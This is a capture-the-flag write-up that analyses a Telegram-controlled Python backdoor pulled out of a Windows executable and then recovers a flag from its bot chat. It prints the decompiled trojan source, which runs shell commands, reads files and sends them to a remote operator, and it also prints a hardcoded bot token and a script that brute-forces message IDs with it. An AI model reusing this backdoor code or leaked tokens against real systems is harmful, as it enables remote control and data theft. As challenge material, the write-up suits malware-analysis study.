Confusing Javascript

---

Reference

https://zachwong02.github.io/post/malware-finds-a-way/zachwong02.github.io

---

Solution

Given a javascript file.

eb925a1589f0c98b5550d3f176a141386bd8285cab874b5ed650535d4a1c0f16.js: JavaScript source, Unicode text, UTF-8 text, with very long lines (766), with CRLF line terminators

Notice that the filename looks like a hash. Initial step taken was putting the filename into VirusTotal.

Link here

From here, the solution can go faster for this challenge without opening the javascript file.

The link provided by the VirusTotal contains a github repository with a malicious executable.

Download the taskmanager.exe for further analysis.

Upon analysing the file using strings command suggest that the executable file was built using Python.

Decompile the executable to its source code using pyinstxtractor .

python3 pyinstxtractor.py taskmanager.exe

There a lot of files in the executable. The most interesting one is PythonTelegramBot.pyc

Extract the pyc file to source code using pycdc

pycdc PythonTelegramBot.pyc

The source code should be something like below.

# Source Generated with Decompyle++
# File: PythonTelegramBot.pyc (Python 3.10)

import telebot
import platform
import subprocess
BOT_API_KEY = '6610257712:AAFq_tYFDs5ZpWttF94KchKyzULBVQUW0PY'
telegram_user_id = 0x1724E8650
bot = telebot.TeleBot(BOT_API_KEY)

def verify_telegram_id(id):
    return telegram_user_id == id


def execute_system_command(cmd):
    max_message_length = 2048
    output = subprocess.getstatusoutput(cmd)
    if len(output[1]) > max_message_length:
        return str(output[1][:max_message_length])
    return None(output[1])


def begin(message):
    if not verify_telegram_id(message.from_user.id):
        return None
    hostname = None('hostname')
    current_user = execute_system_command('whoami')
    response = f'''Running as: {hostname}/{current_user}'''
    bot.reply_to(message, response)

begin = bot.message_handler([
    'start'], **('commands',))(begin)

def injectFlag(message):
    if not verify_telegram_id(message.from_user.id):
        return None
    Flag = None('type flag.txt')
    bot.reply_to(message, Flag)

injectFlag = bot.message_handler([
    'flag'], **('commands',))(injectFlag)

def view_file(message):
    if not verify_telegram_id(message.from_user.id):
        return None
    if None(message.text.split(' ')) != 2:
        return None
    file_path = None.text.split(' ')[1]
    result = ''
    if platform.system() == 'Windows':
        result = execute_system_command(f'''type {file_path}''')
    else:
        result = execute_system_command(f'''cat {file_path}''')
    bot.reply_to(message, result)

view_file = bot.message_handler([
    'viewFile'], **('commands',))(view_file)

def download_file(message):
Unsupported opcode: RERAISE
    if not verify_telegram_id(message.from_user.id):
        return None
    if None(message.text.split(' ')) != 2:
        return None
    file_path = None.text.split(' ')[1]
# WARNING: Decompyle incomplete

download_file = bot.message_handler([
    'downloadFile'], **('commands',))(download_file)

def handle_document_upload(message):
Unsupported opcode: RERAISE
    if not verify_telegram_id(message.from_user.id):
        return None
# WARNING: Decompyle incomplete

handle_document_upload = bot.message_handler([
    'document'], **('content_types',))(handle_document_upload)

def handle_any_command(message):
    if not verify_telegram_id(message.from_user.id):
        return None
    if None.text.startswith('/start'):
        return None
    response = None(message.text)
    bot.reply_to(message, response)

handle_any_command = bot.message_handler()(handle_any_command)
bot.infinity_polling()

Based on the code above, the assumption is that the flag is stored in a chat between the author and the bot.

The specific message stored by the bot needs to be forwarded using the forwardMessage Telegram API call method. With the bot API key and chat ID available, the API request can be constructed once the missing part, which is the message ID, is found

The API request should look like this:

https://api.telegram.org/bot<api_key>/forwardMessage?from_chat_id=<chat_id>&message_id=<message_id>&chat_id=<chat_id>

Create a python script to brute force the message id.

import requests

api_url = "https://api.telegram.org/bot{}/forwardMessage"

bot_token = "6610257712:AAFq_tYFDs5ZpWttF94KchKyzULBVQUW0PY"

from_chat_id = "6212716112"
chat_id = "6212716112"
start_message_id = 0

def brute_force_message_id():
    message_id = start_message_id
    while True:
        try:
            response = requests.post(
                api_url.format(bot_token),
                data={
                    "from_chat_id": from_chat_id,
                    "message_id": message_id,
                    "chat_id": chat_id
                }
            )
            if response.status_code == 200:
                response_data = response.json()
                if 'result' in response_data and 'ihack' in str(response_data):
                    print(f"Found 'ihack' in message ID {message_id}")
                    break
            else:
                print(f"Failed to forward message ID {message_id}: {response.status_code}")

        except requests.exceptions.RequestException as e:
            print(f"Error: {e}")
            break

        message_id += 1
        print(message_id)

if __name__ == "__main__":
    brute_force_message_id()

Then, message ID number 173 was received, and the request now appears as follows:

https://api.telegram.org/bot6610257712:AAFq_tYFDs5ZpWttF94KchKyzULBVQUW0PY/forwardMessage?from_chat_id=6212716112&message_id=173&chat_id=6212716112api.telegram.org

The flag will be shown in a json format as below

---

Flag

ihack24{fr0m_J4V45Cr1p7_2_73L39r4m}